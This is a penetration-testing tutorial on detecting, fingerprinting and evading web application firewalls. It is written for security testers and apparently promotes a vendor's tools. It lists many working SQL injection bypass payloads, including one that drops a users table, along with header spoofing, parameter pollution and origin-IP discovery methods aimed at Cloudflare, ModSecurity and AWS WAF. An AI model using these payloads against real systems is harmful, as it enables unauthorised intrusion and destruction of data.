Web Application Firewall Testing: Detection, Fingerprinting, and Bypass Strategy

Web Application Firewalls (WAFs) are the first line of defense for most modern web applications. As a penetration tester, you'll encounter them constantly — and a WAF blocking your payloads doesn't mean the application is secure. It means you need a different approach. This guide covers the full WAF testing workflow from detection to bypass.

How WAFs Work

Understanding the mechanism tells you how to evade it:

• Signature-based — pattern-matches request content against a database of known attack signatures. Bypass by transforming the payload to avoid matching patterns.
• Anomaly-based / scoring — assigns scores to suspicious characteristics and blocks requests exceeding a threshold. Bypass by distributing suspicious elements across multiple requests or keeping individual anomaly scores low.
• Behavioral — tracks request sequences and rate patterns to detect automated attacks. Bypass with slower, humanized request patterns and distributed source IPs.

Most production WAFs combine all three approaches.

Detecting WAF Presence

Several indicators reveal WAF presence without active probing:

• Response headers — cf-ray (Cloudflare), x-sucuri-id (Sucuri), x-fw-hash (Fortinet), x-amzn-waf (AWS WAF)
• Blocking response codes — 403, 406, 429, or 503 on payload injection (vs. the normal 400/500 the app returns on bad input)
• Blocking response bodies — "Access Denied", "Forbidden by WAF", "Request Blocked", or HTML pages with vendor branding
• IP geolocation changes — the application IP is a CDN/anycast address, not a datacenter IP

Send a deliberate probe to trigger a block and examine the response:

curl -s -o /dev/null -D - "https://example.com/?q=1' OR 1=1--" | head -30

WAF Fingerprinting

wafw00f

The standard tool for WAF fingerprinting. It tests dozens of known WAF signatures:

wafw00f https://example.com
wafw00f -a https://example.com  # test all WAFs, don't stop at first match

nmap WAF NSE Script

nmap --script http-waf-detect,http-waf-fingerprint -p 80,443 example.com

Manual Fingerprinting

Send targeted probes and observe error page characteristics, headers, and cookies:

• Cloudflare — cf-ray header, __cf_bm cookie, error page with "Cloudflare" branding
• Akamai — AkamaiGHost in Server header, akamai-bot-manager cookie
• AWS WAF — 403 with x-amzn-RequestId header
• ModSecurity — "ModSecurity" in response body (if verbose errors enabled), Mod_Security header

Bypass Strategies by WAF

Cloudflare

Cloudflare's signature-based rules are updated frequently but still miss encoding variations:

# Case variation + comments
1' /*!UnIoN*/ /*!SeLeCt*/ 1,2,3--

# Encoding
1'%20/*!UNION*/%20/*!SELECT*/%201,2,3--

# HTTP request smuggling (advanced, version-dependent)
# Find the origin IP to bypass Cloudflare entirely
shodan search "org:TargetCorp http.title:example.com"
# Direct-to-origin requests bypass the WAF

ModSecurity (OWASP CRS)

ModSecurity with the OWASP Core Rule Set (CRS) uses anomaly scoring. Keep your payload score below the threshold:

# Reduce anomaly score by removing obvious keywords
# Instead of: UNION SELECT
/*!50000UNION*/ /*!50000SELECT*/

# Bypass keyword filters with MySQL version-specific comments
SELECT /*!32302 1,2,3 */

# Bypass with HTTP parameter pollution
?id=1&id=2 UNION&id= SELECT 1,2,3--

AWS WAF

# URL + HTML mixed encoding
%27%20OR%20%271%27%3D%271

# Unicode normalization
' OR '1'='1

# JSON injection (AWS WAF often has weaker JSON rule sets)
{"id": "1'; DROP TABLE users--"}

Encoding Evasion Techniques

# Case variation (HTTP is case-insensitive for keywords)
sElEcT * fRoM users

# Whitespace substitution (tabs, newlines, carriage returns)
SELECT%09*%09FROM%09users
SELECT/*comment*/*/*comment*/FROM/*comment*/users

# Null bytes (older WAF versions)
SEL%00ECT * FROM users

Use the WAF Evasion Studio to automatically generate encoding variants of your payloads and test them against configurable WAF rule sets.

HTTP Header Manipulation

Some WAFs inspect fewer headers than the request body:

# X-Forwarded-For bypass (if WAF trusts client IP from header)
X-Forwarded-For: 127.0.0.1

# Header injection for SSRF bypass
X-Original-URL: /admin/internal-endpoint
X-Rewrite-URL: /admin/internal-endpoint

# Content-Type manipulation (WAF may not inspect non-standard content types)
Content-Type: application/x-www-form-urlencoded;charset=ibm037
# Some WAFs skip EBCDIC-encoded bodies

Parameter Pollution

HTTP Parameter Pollution (HPP) exploits servers that concatenate or use the last/first value when a parameter appears multiple times:

# WAF checks first parameter value (safe), app uses concatenated value (malicious)
?id=1&id= UNION SELECT 1,2,3--

# For POST body
id=1&id=;SELECT+1,2,3--

Mutation Engine Approach

Rather than testing individual bypasses, use a mutation engine to systematically generate payload variants:

1. Start with the known-blocked payload
2. Apply transformations: case, encoding, comments, whitespace, fragmentation
3. Test each variant and note which reach the application vs. which are blocked
4. Combine successful individual mutations into compound bypasses

The Encoding Pipeline supports building multi-stage transformation chains to implement this approach. Combine it with the Nuclei Template Builder to scan for WAF bypasses across large target lists once a bypass technique is confirmed.